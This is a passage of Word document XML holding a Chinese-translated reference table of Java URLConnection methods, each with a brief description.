        </w:rPr>
        <w:t>类的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE04EA7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E360A26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>void addRequestProperty(String key, String value)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加由键值对指定的一般请求属性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A303777" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abstract void connect()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开与此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用的资源的通信链接，如果此类连接尚未建立。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CC73AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>boolean getAllowUserInteraction()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回此对象的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> allowUserInteraction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7E641B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int getConnectTimeout()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回连接超时的设置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D31263" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Object getContent()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检索此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37752ABE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Object getContent(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[] classes)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检索此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F59F81" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String getContentEncoding()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> content-encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标题字段的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF4E197" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int getContentLength()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> content-length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标题字段的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367F53DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>long getContentLengthLong()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> content-length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标头字段的值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC148C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String getContentType()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> content-type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标题字段的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B121865" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>long getDate()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标题字段的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503E9835" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>static boolean getDefaultAllowUserInteraction()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> allowUserInteraction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段的默认值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6207F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>static String getDefaultRequestProperty(String key)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已弃用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在获得适当的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URLConnection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例之后，应该使用实例特定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getRequestProperty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D858FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>boolean getDefaultUseCaches()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回默认值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URLConnection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> useCaches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标志。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DA959D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>boolean getDoInput()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URLConnection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> doInput</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标志的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AA6840" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>boolean getDoOutput()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URLConnection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> doOutput</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标志的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096E2C48" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>long getExpiration()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> expires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标题字段的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A56F24" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>static FileNameMap getFileNameMap()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从数据文件加载文件名映射（模拟）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA59FA0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String getHeaderField(int n)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回的值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> n th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头字段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE9BE61" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String getHeaderField(String name)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回命名头字段的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15394F74" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>long getHeaderFieldDate(String name, long Default)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回以日期解析的命名字段的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A9E22B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int getHeaderFieldInt(String name, int Default)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回被解析为命名字段的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A565AF8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String getHeaderFieldKey(int n)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回的关键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> n th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头字段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DECC3A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>long getHeaderFieldLong(String name, long Default)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回被解析为命名字段的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1A6BD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Map&lt;String,List&gt; getHeaderFields()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回不可修改的标题字段的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A78A84" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>long getIfModifiedSince()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回此对象的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ifModifiedSince</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D79D65F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>InputStream getInputStream()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回从此打开的连接读取的输入流。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4621F46C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>long getLastModified()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> last-modified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标题字段的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA9B18" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OutputStream getOutputStream()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回写入此连接的输出流。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0CA29C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Permission getPermission()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回一个权限对象，该对象表示创建此对象所表示的连接所需的权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C73208" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int getReadTimeout()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回读取超时的设置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED74462" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Map&lt;String,List&gt; getRequestProperties()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回此连接的一般请求属性的不可修改映射。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63673785" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String getRequestProperty(String key)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回此连接的命名的常规请求属性的值。</w:t>
      </w:r>
    </w:p>
